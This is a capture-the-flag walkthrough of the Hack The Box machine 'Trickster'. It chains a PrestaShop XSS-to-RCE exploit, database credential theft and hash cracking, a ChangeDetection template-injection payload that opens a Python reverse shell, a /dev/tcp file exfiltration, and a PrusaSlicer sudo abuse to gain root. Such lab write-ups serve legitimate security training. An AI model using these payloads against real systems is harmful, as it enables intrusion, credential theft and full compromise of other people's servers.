Hackthebox: Trickster

Overview

Trickster is a medium-difficulty machine from Hack The Box dealing initially with CVE-2024-34716 which is a PrestaShop XSS to RCE exploit; later extracting some database creds to be able to exploit the internally deployed ChangeDetection instance through CVE-2024-32651 to land a root shell on the docker container. Then, we’ll extract some of the instance backups where we’ll find another user’s password which will lead us to exploiting a PrusaSlicer Arbitrary Code Execution to get root.

Reconnaissance

PS C:\Users\0xkujen> nmap -A -Pn 10.129.46.156 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-01 08:31 W. Central Africa Standard Time
Nmap scan report for 10.129.46.156
Host is up (0.11s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 8c:01:0e:7b:b4:da:b7:2f:bb:2f:d3:a3:8c:a6:6d:87 (ECDSA)
|_  256 90:c6:f3:d8:3f:96:99:94:69:fe:d3:72:cb:fe:6c:c5 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://trickster.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: _; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.44 seconds

We can see that we have our casual ssh 22 port open alongside with a web app on port 80 that’s redirecting us to trickster.htb, so let’s go ahead and add that entry to our /etc/hosts file.

Ffuf - Subdomain Enumeration

Looking more for some subdomains:

PS C:\Users\0xkujen\Tools\ffuf> .\ffuf.exe -w ..\SecLists\Discovery\DNS\bitquark-subdomains-top100000.txt -H "Host: FUZZ.trickster.htb" -u "http://10.129.46.156"  -fc 301

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.147.84
 :: Wordlist         : FUZZ: C:\Users\0xkujen\Tools\SecLists\Discovery\DNS\bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.trickster.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________

shop                    [Status: 403, Size: 283, Words: 20, Lines: 10, Duration: 92ms] ::
:: Progress: [383/100000] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:03] :: Errors: 0 ::

And we got a shop subdomain! Let’s add it to /etc/hosts.

Directory Bruteforcing

PS C:\Users\0xkujen\Tools> feroxbuster.exe -u http://shop.trickster.htb -w .\SecLists\Discovery\Web-Content\big.txt -e

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.8.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://shop.trickster.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ .\SecLists\Discovery\Web-Content\big.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.8.0
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      283c http://shop.trickster.htb/.htaccess
403      GET        9l       28w      283c http://shop.trickster.htb/.bashrc
301      GET        9l       28w      323c http://shop.trickster.htb/.git => http://shop.trickster.htb/.git/

Doing some further enumeration, we find that the .git directory is exposed, we’ll look into this a bit later.

Web Application - http://trickster.htb

Seems just like a casual web application with no apparent features, except for being redirected to shop.trickster.htb when clicking on shop.

Web Application - http://shop.trickster.htb

This is a Prestashop instance.

Now in order for us to look at an exploit, we’ve got to uncover what the .git directory has hidden for us. You can download that directory using the Git-Dumper tool.

One interesting dumped directory was admin634ewutrx1jgitlooaj, we navigate to it on our browser and we get the version:

CVE-2024-34716 - XSS to RCE

CVE-2024-34716 is a cross-site scripting (XSS) vulnerability that only affects PrestaShops with customer-thread feature flag enabled, a hacker can upload a malicious file containing an XSS that will be executed when an admin opens the attached file in back office. The script injected can access the session and the security token, which allows it to perform any authenticated action in the scope of the administrator’s right.

I found this amazing POC when navigating the internet.

PS C:\Users\0xkujen\Desktop\HackThebox\HTB_Machines\Trickster\CVE-2024-34716-new> python3 .\exploit.py --url http://shop.trickster.htb --email [email protected] --local-ip 10.10.x.x  --admin-path admin634ewutrx1jgitlooaj
[X] Starting exploit with:
        Url: http://shop.trickster.htb
        Email: [email protected]
        Local IP: 10.10.x.x
        Admin Path: admin634ewutrx1jgitlooaj
[X] Ncat is now listening on port 12345. Press Ctrl+C to terminate.
Serving at http.Server on port 5000
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:12345
Ncat: Listening on 0.0.0.0:12345
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Request: GET /ps_next_8_theme_malicious.zip HTTP/1.1
Response: 200 -
10.129.46.156 - - [01/Feb/2025 09:26:50] "GET /ps_next_8_theme_malicious.zip HTTP/1.1" 200 -
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Ncat: Connection from 10.129.46.156:33956.
id
Linux trickster 5.15.0-121-generic #131-Ubuntu SMP Fri Aug 9 08:29:53 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 08:36:24 up 58 min,  0 users,  load average: 0.11, 0.16, 0.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

And we are in!

As usual, the first thing to do is to look for database credentials:

$ cat parameters.php
<?php return array (
  'parameters' =>
  array (
    'database_host' => '127.0.0.1',
    'database_port' => '',
    'database_name' => 'prestashop',
    'database_user' => 'ps_user',
    'database_password' => 'prest@shop_o',
    'database_prefix' => 'ps_',
    'database_engine' => 'InnoDB',
    'mailer_transport' => 'smtp',
    'mailer_host' => '127.0.0.1',
    'mailer_user' => NULL,
    'mailer_password' => NULL,
    'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
    'ps_caching' => 'CacheMemcache',
    'ps_cache_enable' => false,
    'ps_creation_date' => '2024-05-25',
    'locale' => 'en-US',
    'use_debug_toolbar' => true,
    'cookie_key' => '8PR6s1SJZLPCjXTegH7fXttSAXbG2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i',
    'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g',
    'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03f4040bd5e8cb44bdb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47',
    <snip>

Now let’s try to get something from the database:

www-data@trickster:/$  mysql -u ps_user -pprest@shop_o
 mysql -u ps_user -pprest@shop_o
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 1649
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| prestashop         |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use prestashop;
use prestashop;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [prestashop]> show tables;
show tables;
+-------------------------------------------------+
| Tables_in_prestashop                            |
+-------------------------------------------------+
<snip>                       |
| ps_employee                                     |
| ps_employee_session                             |
| ps_employee_shop                                |
<snip>                       |
+-------------------------------------------------+
276 rows in set (0.002 sec)

MariaDB [prestashop]> select * from ps_employee;
select * from ps_employee;
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
| id_employee | id_profile | id_lang | lastname | firstname | email               | passwd                                                       | last_passwd_gen     | stats_date_from | stats_date_to | stats_compare_from | stats_compare_to | stats_compare_option | preselect_date_range | bo_color | bo_theme | bo_css    | default_tab | bo_width | bo_menu | active | optin | id_last_order | id_last_customer_message | id_last_customer | last_connection_date | reset_password_token | reset_password_validity | has_enabled_gravatar |
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
|           1 |          1 |       1 | Store    | Trickster | [email protected] | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C | 2024-05-25 13:10:20 | 2024-04-25      | 2024-05-25    | 0000-00-00         | 0000-00-00       |                    1 | NULL                 | NULL     | default  | theme.css |           1 |        0 |       1 |      1 |  NULL |             5 |                        0 |                0 | 2025-02-01           | NULL                 | 0000-00-00 00:00:00     |                    0 |
|           2 |          2 |       0 | james    | james     | [email protected] | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm | 2024-09-09 13:22:42 | NULL            | NULL          | NULL               | NULL             |                    1 | NULL                 | NULL     | NULL     | NULL      |           0 |        0 |       1 |      0 |  NULL |             0 |                        0 |                0 | NULL                 | NULL                 | NULL                    |                    0 |
+-------------+------------+---------+----------+-----------+---------------------+--------------------------------------------------------------+---------------------+-----------------+---------------+--------------------+------------------+----------------------+----------------------+----------+----------+-----------+-------------+----------+---------+--------+-------+---------------+--------------------------+------------------+----------------------+----------------------+-------------------------+----------------------+
2 rows in set (0.000 sec)

MariaDB [prestashop]>

With a simple johntheripper command we can get our password:

┌──(kali㉿kali)-[~/hackthebox/trickster]
└─$ john  --wordlist=/home/kali/Desktop/rockyou.txt hash                                                                                                                   130 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alwaysandforever (?)
1g 0:00:00:02 DONE (2024-09-21 18:47) 0.3401g/s 12600p/s 12600c/s 12600C/s baloon..alex4ever
Use the "--show" option to display all of the cracked passwords reliably
Session completed                                                                                                                                                                   
┌──(kali㉿kali)-[~/hackthebox/trickster]
└─$ 

Let’s now get our user flag:

PS C:\Users\0xkujen> ssh [email protected]
The authenticity of host 'trickster.htb (10.129.46.156)' can't be established.
ED25519 key fingerprint is SHA256:SZyh4Oq8EYrDd5T2R0ThbtNWVAlQWg+Gp7XwsR6zq7o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'trickster.htb' (ED25519) to the list of known hosts.
[email protected]'s password:
Last login: Thu Sep 26 11:13:01 2024 from 10.10.14.41
james@trickster:~$ cat user.txt
a52e7e89c3d548******************
james@trickster:~$

Privilege Escalation - ChangeDetection SSTI

First, I can use fscan which is a comprehensive intranet scanning tool to scan for open ports (since we found a docker interface on the machine):
Running ./fscan -h 172.17.0.1/24 we find that the actual IP is 172.17.0.2, now we scan for open ports:

james@trickster:~$ ./fscan  -h 172.17.0.2 -p 1-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 1-65535
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 65535 个有效端口
[+] 端口开放 172.17.0.2:5000

And we got port 5000, so let’s forward that to our machine:

We can simply use james’ password to login:

Changedetection tracks changes on websites and notifies users of updates. Certain versions are vulnerable to SSTI, like the one we have on our hands.
We can find a good PoC here
Just launch a web server, create a new website as detailed below, and then insert your SSTI script in the notification body and gets://10.10.x.x in the notification URL:

{{ self.__init__.__globals__.__builtins__.__import__('os').system('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.x.x",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")\'') }}

And we’re in:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.46.181] 53754
# id
id
uid=0(root) gid=0(root) groups=0(root)
#

Under /datastore/Backups we find a couple changedetection backups:

# ls
ls
changedetection-backup-20240830194841.zip
changedetection-backup-20240830202524.zip
# pwd
pwd
/datastore/Backups
#

Let’s get them on our machine. We can do it by running cat changedetection-backup-20240830194841.zip > /dev/tcp/10.10.x.x/9002 on the victim machine and nc -lvnp 9002 > changedetection.zip on our machine.

Doing this first game me a corrupt file, so the way is to transfer the files first to james’ session and then to our machine.
We can find a couple of interesting files, one of which is a brotli compressed file:

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         8/31/2024  12:47 AM           2605 f04f0732f120c0cc84a993ad99decb2c.txt.br
-a----         8/31/2024  12:47 AM             51 history.txt

We can run the command brotli -d filename.br and we can get the password for adam user adam_admin992:

adam@trickster:~$ id
uid=1002(adam) gid=1002(adam) groups=1002(adam)
adam@trickster:~$

Pivoting to root - prusaslicer abuse

Now checking what we can execute as root:

adam@trickster:~$ sudo -l
Matching Defaults entries for adam on trickster:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User adam may run the following commands on trickster:
    (ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer

PrusaSlicer takes 3D models (STL, OBJ, AMF) and converts them into G-code instructions for FFF printers or PNG layers for mSLA 3D printers.

We can find this PrusaSlicer exploit

We simply have to update our exploit.sh file and execute the evil.3mf file as root using prusaslicer:

adam@trickster:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14  2024 /bin/bash
adam@trickster:~$ bash -p
bash-5.1# id
uid=1002(adam) gid=1002(adam) euid=0(root) egid=0(root) groups=0(root),1002(adam)
bash-5.1# cat /root/root.txt
0c6be42265e6c2******************
bash-5.1#

And that was it for Trickster, hope you learned something new!
-0xkujen